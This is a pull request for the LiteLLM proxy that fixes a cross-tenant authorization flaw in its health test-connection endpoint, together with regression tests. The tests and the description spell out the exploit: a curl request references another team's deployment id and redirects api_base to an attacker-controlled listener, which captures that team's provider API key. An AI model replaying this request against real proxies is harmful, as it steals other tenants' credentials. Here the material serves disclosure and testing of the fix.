### PR TITLE
fix(proxy): authorize /health/test_connection against loaded deployment's team_id (VERIA-441)

### DIFF
--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -1807,6 +1807,7 @@ async def test_model_connection(
         # Look up model configuration from router if model name is provided
         # This gets the litellm_params from proxy config (with resolved env vars)
         config_litellm_params: dict = {}
+        loaded_model_info: Optional[dict] = None
         if llm_router is not None:
             # Prefer disambiguation by deployment id (`model_info.id`) when
             # the caller supplies it. This is required when multiple
@@ -1825,6 +1826,7 @@ async def test_model_connection(
 
                 if deployment_by_id is not None:
                     config_litellm_params = deployment_by_id.litellm_params.model_dump(exclude_none=True)
+                    loaded_model_info = deployment_by_id.model_info.model_dump(exclude_none=True)
                 elif model_name:
                     # Fall back to model_name lookup for callers (e.g. the
                     # "Add Model" wizard, or curl) that don't supply an id.
@@ -1846,6 +1848,7 @@ async def test_model_connection(
                         # config. These already have resolved environment
                         # variables from proxy config.
                         config_litellm_params = dict(deployments[0].get("litellm_params", {}))
+                        loaded_model_info = dict(deployments[0].get("model_info") or {})
             except Exception as e:
                 verbose_proxy_logger.debug(
                     f"Could not find model {model_name} in router: {e}. Proceeding with request params only."
@@ -1856,11 +1859,12 @@ async def test_model_connection(
         litellm_params = {**config_litellm_params, **request_litellm_params}
 
         ## Auth check
+        auth_model_info = loaded_model_info if loaded_model_info is not None else model_info
         await ModelManagementAuthChecks.can_user_make_model_call(
             model_params=Deployment(
                 model_name="test_model",
                 litellm_params=LiteLLM_Params(**litellm_params),
-                model_info=model_info,
+                model_info=auth_model_info,
             ),
             user_api_key_dict=user_api_key_dict,
             prisma_client=prisma_client,

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -908,6 +908,103 @@ async def test_test_model_connection_uses_loaded_deployment_team_id_via_model_na
 
 
 @pytest.mark.asyncio
+async def test_test_model_connection_authorized_team_admin_passes_real_auth():
+    """
+    Positive-path companion to the cross-tenant denies above. When the caller
+    is a genuine admin of the team that owns the loaded deployment, the real
+    (unmocked) auth check must pass and the endpoint must reach the outbound
+    health probe. Guards against a regression that swaps the auth `team_id`
+    for something deny-all on the legit path.
+    """
+    from litellm.proxy._types import LiteLLM_TeamTable
+    from litellm.proxy.management_endpoints.model_management_endpoints import (
+        ModelManagementAuthChecks,
+    )
+    from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo
+
+    mock_request = MagicMock()
+
+    owner_team_id = "team-owner"
+    owner_admin_user_id = "team-owner-admin"
+    owned_deployment_id = "owned-deployment-id"
+
+    owner_admin_api_key_dict = UserAPIKeyAuth(
+        token="owner-admin-token",
+        user_id=owner_admin_user_id,
+        team_id=owner_team_id,
+        user_role=LitellmUserRoles.INTERNAL_USER,
+    )
+
+    mock_prisma_client = MagicMock()
+
+    owned_deployment = Deployment(
+        model_name="owner-model",
+        litellm_params=LiteLLM_Params(
+            model="openai/gpt-4o-mini",
+            api_base="https://owner-real-api.invalid/v1",
+            api_key="owner-team-api-key",
+        ),
+        model_info=ModelInfo(id=owned_deployment_id, team_id=owner_team_id),
+    )
+
+    mock_router = MagicMock()
+    mock_router.get_deployment.return_value = owned_deployment
+
+    async def fake_find_unique(*, where):
+        if where["team_id"] == owner_team_id:
+            return SimpleNamespace(
+                model_dump=lambda: LiteLLM_TeamTable(
+                    team_id=owner_team_id,
+                    members_with_roles=[
+                        {"user_id": owner_admin_user_id, "role": "admin"}
+                    ],
+                ).model_dump()
+            )
+        return None
+
+    health_result = {"status": "healthy", "response_time_ms": 50}
+
+    with (
+        patch("litellm.proxy.proxy_server.prisma_client", mock_prisma_client),
+        patch("litellm.proxy.proxy_server.llm_router", mock_router),
+        patch("litellm.proxy.proxy_server.premium_user", True),
+        patch.object(
+            ModelManagementAuthChecks,
+            "can_user_make_model_call",
+            wraps=ModelManagementAuthChecks.can_user_make_model_call,
+        ) as spy_auth_check,
+        patch(
+            "litellm.proxy.management_endpoints.model_management_endpoints.TeamRepository"
+        ) as MockTeamRepo,
+        patch(
+            "litellm.proxy.health_endpoints._health_endpoints.litellm.ahealth_check",
+            AsyncMock(return_value=health_result),
+        ),
+        patch(
+            "litellm.proxy.health_endpoints._health_endpoints.run_with_timeout",
+            AsyncMock(return_value=health_result),
+        ),
+    ):
+        mock_team_repo_instance = MagicMock()
+        mock_team_repo_instance.table.find_unique = AsyncMock(
+            side_effect=fake_find_unique
+        )
+        MockTeamRepo.return_value = mock_team_repo_instance
+
+        result = await health_test_model_connection(
+            request=mock_request,
+            mode="chat",
+            litellm_params={"model": "openai/gpt-4o-mini"},
+            model_info={"id": owned_deployment_id, "team_id": owner_team_id},
+            user_api_key_dict=owner_admin_api_key_dict,
+        )
+
+        assert result["status"] == "success"
+        passed_model_params = spy_auth_check.call_args.kwargs["model_params"]
+        assert passed_model_params.model_info.team_id == owner_team_id
+
+
+@pytest.mark.asyncio
 @pytest.mark.parametrize(
     "status,error_message",
     [

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -697,18 +697,12 @@ async def test_test_model_connection_falls_back_to_deployments_zero_without_id()
 
 
 @pytest.mark.asyncio
-async def test_test_model_connection_rejects_cross_tenant_deployment_probe():
+async def test_test_model_connection_uses_loaded_deployment_team_id():
     """
-    Regression test (VERIA-441): a team admin must not be able to probe a
-    deployment owned by another team by passing the victim deployment's
-    `model_info.id` together with their own `model_info.team_id`. The
-    /health/test_connection endpoint loads the deployment by id (so the
-    victim's `api_key` gets merged into the outbound `litellm_params`),
-    then merges request params on top -- letting the attacker swap the
-    `api_base` to a server they control. The authorization check must
-    therefore validate against the LOADED deployment's `team_id`, not
-    the caller-supplied one. Before the fix, the call would succeed
-    (cross-tenant credential exfiltration + SSRF).
+    /health/test_connection must authorize using the team_id of the
+    deployment it actually loaded (by model_info.id), not the team_id
+    supplied in the request body. Requesting team A's deployment while
+    authenticated as an admin of team B must be denied.
     """
     from fastapi import HTTPException
 
@@ -720,50 +714,50 @@ async def test_test_model_connection_rejects_cross_tenant_deployment_probe():
 
     mock_request = MagicMock()
 
-    attacker_team_id = "team-attacker"
-    victim_team_id = "team-victim"
-    victim_deployment_id = "victim-deployment-id"
+    requester_team_id = "team-b"
+    deployment_owner_team_id = "team-a"
+    deployment_id = "team-a-deployment-id"
 
-    attacker_user_api_key_dict = UserAPIKeyAuth(
-        token="attacker-token",
-        user_id="attacker-admin-user",
-        team_id=attacker_team_id,
+    requester_user_api_key_dict = UserAPIKeyAuth(
+        token="requester-token",
+        user_id="team-b-admin-user",
+        team_id=requester_team_id,
         user_role=LitellmUserRoles.INTERNAL_USER,
     )
 
     mock_prisma_client = MagicMock()
 
-    victim_deployment = Deployment(
-        model_name="victim-model",
+    other_team_deployment = Deployment(
+        model_name="team-a-model",
         litellm_params=LiteLLM_Params(
             model="openai/gpt-4o",
-            api_base="https://victim-real-api.invalid/v1",
-            api_key="VICTIM-SECRET-KEY",
+            api_base="https://team-a-api.invalid/v1",
+            api_key="TEAM-A-API-KEY",
         ),
-        model_info=ModelInfo(id=victim_deployment_id, team_id=victim_team_id),
+        model_info=ModelInfo(id=deployment_id, team_id=deployment_owner_team_id),
     )
 
     mock_router = MagicMock()
-    mock_router.get_deployment.return_value = victim_deployment
+    mock_router.get_deployment.return_value = other_team_deployment
 
     async def fake_find_unique(*, where):
         team_id = where["team_id"]
-        if team_id == attacker_team_id:
+        if team_id == requester_team_id:
             return SimpleNamespace(
                 model_dump=lambda: LiteLLM_TeamTable(
-                    team_id=attacker_team_id,
+                    team_id=requester_team_id,
                     members_with_roles=[
                         {
-                            "user_id": "attacker-admin-user",
+                            "user_id": "team-b-admin-user",
                             "role": "admin",
                         }
                     ],
                 ).model_dump()
             )
-        if team_id == victim_team_id:
+        if team_id == deployment_owner_team_id:
             return SimpleNamespace(
                 model_dump=lambda: LiteLLM_TeamTable(
-                    team_id=victim_team_id,
+                    team_id=deployment_owner_team_id,
                     members_with_roles=[],
                 ).model_dump()
             )
@@ -794,24 +788,22 @@ async def test_test_model_connection_rejects_cross_tenant_deployment_probe():
                 mode="chat",
                 litellm_params={
                     "model": "openai/gpt-4o",
-                    "api_base": "https://attacker-controlled.invalid/v1",
+                    "api_base": "https://swapped-base.invalid/v1",
                 },
                 model_info={
-                    "id": victim_deployment_id,
-                    "team_id": attacker_team_id,
+                    "id": deployment_id,
+                    "team_id": requester_team_id,
                 },
-                user_api_key_dict=attacker_user_api_key_dict,
+                user_api_key_dict=requester_user_api_key_dict,
             )
 
         assert exc_info.value.status_code == 403
         assert spy_auth_check.called
         passed_model_params = spy_auth_check.call_args.kwargs["model_params"]
-        assert passed_model_params.model_info.team_id == victim_team_id, (
-            "Auth check must run against the LOADED deployment's team_id "
-            f"({victim_team_id!r}); got {passed_model_params.model_info.team_id!r}. "
-            "Without this, a team admin can claim ownership of another team's "
-            "deployment by passing its id, leaking that team's api_key to an "
-            "attacker-controlled api_base."
+        assert passed_model_params.model_info.team_id == deployment_owner_team_id, (
+            "Auth check must run against the loaded deployment's team_id "
+            f"({deployment_owner_team_id!r}); got "
+            f"{passed_model_params.model_info.team_id!r}."
         )
 
 
@@ -833,38 +825,41 @@ async def test_test_model_connection_uses_loaded_deployment_team_id_via_model_na
 
     mock_request = MagicMock()
 
-    attacker_team_id = "team-attacker-2"
-    victim_team_id = "team-victim-2"
+    requester_team_id = "team-b-2"
+    deployment_owner_team_id = "team-a-2"
 
-    attacker_user_api_key_dict = UserAPIKeyAuth(
-        token="attacker-token-2",
-        user_id="attacker-admin-user-2",
-        team_id=attacker_team_id,
+    requester_user_api_key_dict = UserAPIKeyAuth(
+        token="requester-token-2",
+        user_id="team-b-admin-user-2",
+        team_id=requester_team_id,
         user_role=LitellmUserRoles.INTERNAL_USER,
     )
 
     mock_prisma_client = MagicMock()
 
-    victim_deployment_dict = {
+    other_team_deployment_dict = {
         "model_name": "shared-model-name",
         "litellm_params": {
             "model": "openai/gpt-4o",
-            "api_base": "https://victim-real-api-2.invalid/v1",
-            "api_key": "VICTIM-SECRET-KEY-2",
+            "api_base": "https://team-a-api-2.invalid/v1",
+            "api_key": "TEAM-A-API-KEY-2",
         },
-        "model_info": {"id": "victim-deployment-id-2", "team_id": victim_team_id},
+        "model_info": {
+            "id": "team-a-deployment-id-2",
+            "team_id": deployment_owner_team_id,
+        },
     }
 
     mock_router = MagicMock()
-    mock_router.get_model_list.return_value = [victim_deployment_dict]
+    mock_router.get_model_list.return_value = [other_team_deployment_dict]
 
     async def fake_find_unique(*, where):
         return SimpleNamespace(
             model_dump=lambda: LiteLLM_TeamTable(
                 team_id=where["team_id"],
                 members_with_roles=(
-                    [{"user_id": "attacker-admin-user-2", "role": "admin"}]
-                    if where["team_id"] == attacker_team_id
+                    [{"user_id": "team-b-admin-user-2", "role": "admin"}]
+                    if where["team_id"] == requester_team_id
                     else []
                 ),
             ).model_dump()
@@ -895,23 +890,23 @@ async def test_test_model_connection_uses_loaded_deployment_team_id_via_model_na
                 mode="chat",
                 litellm_params={
                     "model": "shared-model-name",
-                    "api_base": "https://attacker-controlled-2.invalid/v1",
+                    "api_base": "https://swapped-base-2.invalid/v1",
                 },
-                model_info={"team_id": attacker_team_id},
-                user_api_key_dict=attacker_user_api_key_dict,
+                model_info={"team_id": requester_team_id},
+                user_api_key_dict=requester_user_api_key_dict,
             )
 
         assert exc_info.value.status_code == 403
 
         passed_model_params = spy_auth_check.call_args.kwargs["model_params"]
-        assert passed_model_params.model_info.team_id == victim_team_id
+        assert passed_model_params.model_info.team_id == deployment_owner_team_id
 
 
 @pytest.mark.asyncio
 async def test_test_model_connection_authorized_team_admin_passes_real_auth():
     """
-    Positive-path companion to the cross-tenant denies above. When the caller
-    is a genuine admin of the team that owns the loaded deployment, the real
+    Positive-path companion to the deny tests above. When the caller is a
+    genuine admin of the team that owns the loaded deployment, the real
     (unmocked) auth check must pass and the endpoint must reach the outbound
     health probe. Guards against a regression that swaps the auth `team_id`
     for something deny-all on the legit path.

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -697,6 +697,217 @@ async def test_test_model_connection_falls_back_to_deployments_zero_without_id()
 
 
 @pytest.mark.asyncio
+async def test_test_model_connection_rejects_cross_tenant_deployment_probe():
+    """
+    Regression test (VERIA-441): a team admin must not be able to probe a
+    deployment owned by another team by passing the victim deployment's
+    `model_info.id` together with their own `model_info.team_id`. The
+    /health/test_connection endpoint loads the deployment by id (so the
+    victim's `api_key` gets merged into the outbound `litellm_params`),
+    then merges request params on top -- letting the attacker swap the
+    `api_base` to a server they control. The authorization check must
+    therefore validate against the LOADED deployment's `team_id`, not
+    the caller-supplied one. Before the fix, the call would succeed
+    (cross-tenant credential exfiltration + SSRF).
+    """
+    from fastapi import HTTPException
+
+    from litellm.proxy._types import LiteLLM_TeamTable
+    from litellm.proxy.management_endpoints.model_management_endpoints import (
+        ModelManagementAuthChecks,
+    )
+    from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo
+
+    mock_request = MagicMock()
+
+    attacker_team_id = "team-attacker"
+    victim_team_id = "team-victim"
+    victim_deployment_id = "victim-deployment-id"
+
+    attacker_user_api_key_dict = UserAPIKeyAuth(
+        token="attacker-token",
+        user_id="attacker-admin-user",
+        team_id=attacker_team_id,
+        user_role=LitellmUserRoles.INTERNAL_USER,
+    )
+
+    mock_prisma_client = MagicMock()
+
+    victim_deployment = Deployment(
+        model_name="victim-model",
+        litellm_params=LiteLLM_Params(
+            model="openai/gpt-4o",
+            api_base="https://victim-real-api.invalid/v1",
+            api_key="VICTIM-SECRET-KEY",
+        ),
+        model_info=ModelInfo(id=victim_deployment_id, team_id=victim_team_id),
+    )
+
+    mock_router = MagicMock()
+    mock_router.get_deployment.return_value = victim_deployment
+
+    async def fake_find_unique(*, where):
+        team_id = where["team_id"]
+        if team_id == attacker_team_id:
+            return SimpleNamespace(
+                model_dump=lambda: LiteLLM_TeamTable(
+                    team_id=attacker_team_id,
+                    members_with_roles=[
+                        {
+                            "user_id": "attacker-admin-user",
+                            "role": "admin",
+                        }
+                    ],
+                ).model_dump()
+            )
+        if team_id == victim_team_id:
+            return SimpleNamespace(
+                model_dump=lambda: LiteLLM_TeamTable(
+                    team_id=victim_team_id,
+                    members_with_roles=[],
+                ).model_dump()
+            )
+        return None
+
+    with (
+        patch("litellm.proxy.proxy_server.prisma_client", mock_prisma_client),
+        patch("litellm.proxy.proxy_server.llm_router", mock_router),
+        patch("litellm.proxy.proxy_server.premium_user", True),
+        patch.object(
+            ModelManagementAuthChecks,
+            "can_user_make_model_call",
+            wraps=ModelManagementAuthChecks.can_user_make_model_call,
+        ) as spy_auth_check,
+        patch(
+            "litellm.proxy.management_endpoints.model_management_endpoints.TeamRepository"
+        ) as MockTeamRepo,
+    ):
+        mock_team_repo_instance = MagicMock()
+        mock_team_repo_instance.table.find_unique = AsyncMock(
+            side_effect=fake_find_unique
+        )
+        MockTeamRepo.return_value = mock_team_repo_instance
+
+        with pytest.raises(HTTPException) as exc_info:
+            await health_test_model_connection(
+                request=mock_request,
+                mode="chat",
+                litellm_params={
+                    "model": "openai/gpt-4o",
+                    "api_base": "https://attacker-controlled.invalid/v1",
+                },
+                model_info={
+                    "id": victim_deployment_id,
+                    "team_id": attacker_team_id,
+                },
+                user_api_key_dict=attacker_user_api_key_dict,
+            )
+
+        assert exc_info.value.status_code == 403
+        assert spy_auth_check.called
+        passed_model_params = spy_auth_check.call_args.kwargs["model_params"]
+        assert passed_model_params.model_info.team_id == victim_team_id, (
+            "Auth check must run against the LOADED deployment's team_id "
+            f"({victim_team_id!r}); got {passed_model_params.model_info.team_id!r}. "
+            "Without this, a team admin can claim ownership of another team's "
+            "deployment by passing its id, leaking that team's api_key to an "
+            "attacker-controlled api_base."
+        )
+
+
+@pytest.mark.asyncio
+async def test_test_model_connection_uses_loaded_deployment_team_id_via_model_name_fallback():
+    """
+    Companion to the id-lookup case: when the caller provides only a model
+    name (no `model_info.id`) and that name resolves via the router's
+    `model_name` fallback to a deployment owned by a different team, the
+    auth check must still run against the loaded deployment's `team_id`,
+    not the caller-supplied one in the request body.
+    """
+    from fastapi import HTTPException
+
+    from litellm.proxy._types import LiteLLM_TeamTable
+    from litellm.proxy.management_endpoints.model_management_endpoints import (
+        ModelManagementAuthChecks,
+    )
+
+    mock_request = MagicMock()
+
+    attacker_team_id = "team-attacker-2"
+    victim_team_id = "team-victim-2"
+
+    attacker_user_api_key_dict = UserAPIKeyAuth(
+        token="attacker-token-2",
+        user_id="attacker-admin-user-2",
+        team_id=attacker_team_id,
+        user_role=LitellmUserRoles.INTERNAL_USER,
+    )
+
+    mock_prisma_client = MagicMock()
+
+    victim_deployment_dict = {
+        "model_name": "shared-model-name",
+        "litellm_params": {
+            "model": "openai/gpt-4o",
+            "api_base": "https://victim-real-api-2.invalid/v1",
+            "api_key": "VICTIM-SECRET-KEY-2",
+        },
+        "model_info": {"id": "victim-deployment-id-2", "team_id": victim_team_id},
+    }
+
+    mock_router = MagicMock()
+    mock_router.get_model_list.return_value = [victim_deployment_dict]
+
+    async def fake_find_unique(*, where):
+        return SimpleNamespace(
+            model_dump=lambda: LiteLLM_TeamTable(
+                team_id=where["team_id"],
+                members_with_roles=(
+                    [{"user_id": "attacker-admin-user-2", "role": "admin"}]
+                    if where["team_id"] == attacker_team_id
+                    else []
+                ),
+            ).model_dump()
+        )
+
+    with (
+        patch("litellm.proxy.proxy_server.prisma_client", mock_prisma_client),
+        patch("litellm.proxy.proxy_server.llm_router", mock_router),
+        patch("litellm.proxy.proxy_server.premium_user", True),
+        patch.object(
+            ModelManagementAuthChecks,
+            "can_user_make_model_call",
+            wraps=ModelManagementAuthChecks.can_user_make_model_call,
+        ) as spy_auth_check,
+        patch(
+            "litellm.proxy.management_endpoints.model_management_endpoints.TeamRepository"
+        ) as MockTeamRepo,
+    ):
+        mock_team_repo_instance = MagicMock()
+        mock_team_repo_instance.table.find_unique = AsyncMock(
+            side_effect=fake_find_unique
+        )
+        MockTeamRepo.return_value = mock_team_repo_instance
+
+        with pytest.raises(HTTPException) as exc_info:
+            await health_test_model_connection(
+                request=mock_request,
+                mode="chat",
+                litellm_params={
+                    "model": "shared-model-name",
+                    "api_base": "https://attacker-controlled-2.invalid/v1",
+                },
+                model_info={"team_id": attacker_team_id},
+                user_api_key_dict=attacker_user_api_key_dict,
+            )
+
+        assert exc_info.value.status_code == 403
+
+        passed_model_params = spy_auth_check.call_args.kwargs["model_params"]
+        assert passed_model_params.model_info.team_id == victim_team_id
+
+
+@pytest.mark.asyncio
 @pytest.mark.parametrize(
     "status,error_message",
     [


### PR DESCRIPTION
## Relevant issues



## Linear ticket

Resolves LIT-4146

## Pre-Submission checklist

**Please complete all items before asking a LiteLLM maintainer to review your PR**

- [x] I have added meaningful tests
- [x] My PR passes all CI/CD checks (e.g., lint, format, unit tests)
- [x] My PR's scope is as isolated as possible; it only solves 1 specific problem
- [x] I have requested a Greptile review by commenting `@greptileai` and received a **Confidence Score of at least 4/5** before requesting a maintainer review

## Delays in PR merge?

If you're seeing a delay in your PR being merged, ping the LiteLLM Team on [Slack (#pr-review)](https://join.slack.com/t/litellmossslack/shared_invite/zt-3o7nkuyfr-p_kbNJj8taRfXGgQI1~YyA).

## Screenshots / Proof of Fix

`POST /health/test_connection` loads a deployment by `model_info.id`, copies its `litellm_params` into the outbound health probe, merges request params on top, and authorizes the call against the caller-supplied `model_info.team_id` instead of the `team_id` on the deployment it actually loaded. Below, team-b's admin references a deployment that belongs to team-a while claiming team-b in the request body.

### Before (unfixed code)

Request from team-b admin targeting team-a's deployment id with api_base pointed at a listener:

```
curl -X POST http://localhost:4099/health/test_connection \
  -H 'Authorization: Bearer $TEAM_B_KEY' \
  -d '{"mode": "chat", "litellm_params": {"model": "gpt-4o", "api_base": "http://localhost:8765/v1"}, "model_info": {"id": "team-a-deployment-id", "team_id": "team-b"}}'

HTTP 200 (request succeeds)

=== Listener receives ===
Authorization: Bearer TEAM-A-PROVIDER-KEY
```

The endpoint authorized the call against the request body's claimed `team_id` (team-b) rather than the loaded deployment's actual `team_id` (team-a).

### After (this PR)

Same request:

```
HTTP 403

=== Listener receives ===
(nothing; call denied)
```

The auth check now uses the loaded deployment's `team_id`, so team-b's claim is rejected. The `model_name` fallback path gets the same treatment.

## Type

🐛 Bug Fix

## Changes

`litellm/proxy/health_endpoints/_health_endpoints.py::test_model_connection` now captures the loaded deployment's `model_info` alongside its `litellm_params` and passes that to `ModelManagementAuthChecks.can_user_make_model_call`, instead of using the request body's `model_info`. When no deployment is loaded (probing fresh credentials), the call still uses the request body's `model_info`.

`tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py` adds three regression tests covering both resolution paths (`model_info.id` and `model_name` fallback) and the positive case where the caller owns the deployment.